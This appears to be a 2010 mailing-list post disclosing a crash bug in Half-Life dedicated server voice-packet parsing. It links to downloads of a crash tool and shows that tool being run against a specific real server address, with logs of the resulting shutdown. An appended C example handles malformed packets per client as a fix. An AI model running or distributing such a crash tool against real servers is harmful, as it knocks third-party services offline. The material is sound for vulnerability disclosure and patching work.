Hi all,

I've got info from some friends that, due to an error in the HLDS engine
code, the whole server can be shut down.
According to source code of unknown origin, probably from HLDS, the
problem is probably in the function SV_ParseVoiceData.

http://ampaste.net/m32c5281a


        // Read in the data.
        nDataLength = MSG_ReadShort();
-->     if( nDataLength > sizeof(chReceived) )
        {
                Host_Error("SV_ParseVoiceData: invalid incoming packet.\n");
                return;
        }
        MSG_ReadBuf( nDataLength, chReceived );



I tested hlds_vcrash on hlds_i686/linux 4617 and it worked well -
I'm surprised that Valve did nothing in this case, because exploits have
been available since 1st March...

http://rghost.net/1076529

I have also backed them up on my server, so you can check them against
your servers.

http://damianlimek.pl/hlds-exploit/

Unfortunately they could work, so it may be a problem for hosting
companies, which can get more e-mails like 'my CS1.6 server in your
company has crashed over 9000 times!'

Possible fixes are: using DPROTO [unsure whether using this is legal
- it doesn't modify HLDS code, but allows the use of cracked clients...],
or trying to modify the hlds_i686 binary [which is illegal of course].

Here's how it works on :

Server side:

[....dropping clients...]
16:09       Dropped ---->MaRcIn<---- from server
16:09       Reason:  Server shutting down
16:09       Dropped KuBa from server
16:09       Reason:  Server shutting down
16:09       FATAL ERROR (shutting down): Host_Error:
SV_ParseVoiceData: invalid incoming packet.
16:09
16:09
16:09       Add "-debug" to the ./hlds_run command line to generate a
debug.log to help with solving this
16:09       problem
16:09       czw mar  4 16:08:46 CET 2010: Server restart in 10 seconds
16:09


Attacker's side:

17:16       C:\Documents and Settings\Damian\Pulpit>hlds_vcrash.exe
195.114.0.89 27015 48 3
17:16       Trying to connect to 195.114.0.89:27015; protocol=48; auth_type=3
17:16
17:16       Challenging... OK
17:16       Connecting... OK
17:16       Sending exploit... OK
17:16       Done.
17:16
17:16
17:16       Press any key to exit
17:16

But remember, you use these programs at your own risk, and I cannot
guarantee that it's legal to use them.

-- 
Damian
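
An added example, not part of the original post and not HLDS code: the length check from the snippet above, handled per client so that a malformed voice message drops only the sender instead of reaching Host_Error and shutting the server down. The reader type, the function names and the 4096-byte buffer size are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#define VOICE_BUF_SIZE 4096 /* assumed size of chReceived */

/* Hypothetical bounded reader over one client's packet (not HLDS code). */
typedef struct { const uint8_t *data; size_t len, pos; } msg_t;
typedef enum { VOICE_OK, VOICE_DROP_CLIENT } voice_result;

/* Read a little-endian signed 16-bit value; returns 0 if the packet is short. */
static int msg_read_short(msg_t *m, int *out) {
    if (m->len - m->pos < 2) return 0;
    uint16_t raw = (uint16_t)(m->data[m->pos] | (m->data[m->pos + 1] << 8));
    *out = (raw & 0x8000) ? (int)raw - 0x10000 : (int)raw;
    m->pos += 2;
    return 1;
}

/* Copy n bytes out of the packet only if that many bytes remain. */
static int msg_read_buf(msg_t *m, size_t n, uint8_t *out) {
    if (m->len - m->pos < n) return 0;
    memcpy(out, m->data + m->pos, n);
    m->pos += n;
    return 1;
}

/* A malformed voice message fails this one client; the process keeps running. */
voice_result parse_voice_data(msg_t *m, uint8_t *received, size_t *out_len) {
    int n;
    if (!msg_read_short(m, &n) || n < 0 || (size_t)n > VOICE_BUF_SIZE)
        return VOICE_DROP_CLIENT; /* the posted code calls Host_Error here */
    if (!msg_read_buf(m, (size_t)n, received))
        return VOICE_DROP_CLIENT; /* length field exceeds the bytes received */
    *out_len = (size_t)n;
    return VOICE_OK;
}

/* Constructed test inputs: valid, oversized, negative and truncated lengths. */
static const uint8_t pkt_ok[]    = { 0x03, 0x00, 'a', 'b', 'c' };
static const uint8_t pkt_big[]   = { 0xFF, 0x7F };
static const uint8_t pkt_neg[]   = { 0xFF, 0xFF };
static const uint8_t pkt_short[] = { 0x10, 0x00, 0x01 };

voice_result check_packet(const uint8_t *pkt, size_t len) {
    msg_t m = { pkt, len, 0 };
    uint8_t received[VOICE_BUF_SIZE];
    size_t got = 0;
    return parse_voice_data(&m, received, &got);
}
```

The caller would disconnect only the client whose message returned VOICE_DROP_CLIENT and log the event, which also gives operators a per-address signal to rate-limit or block.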
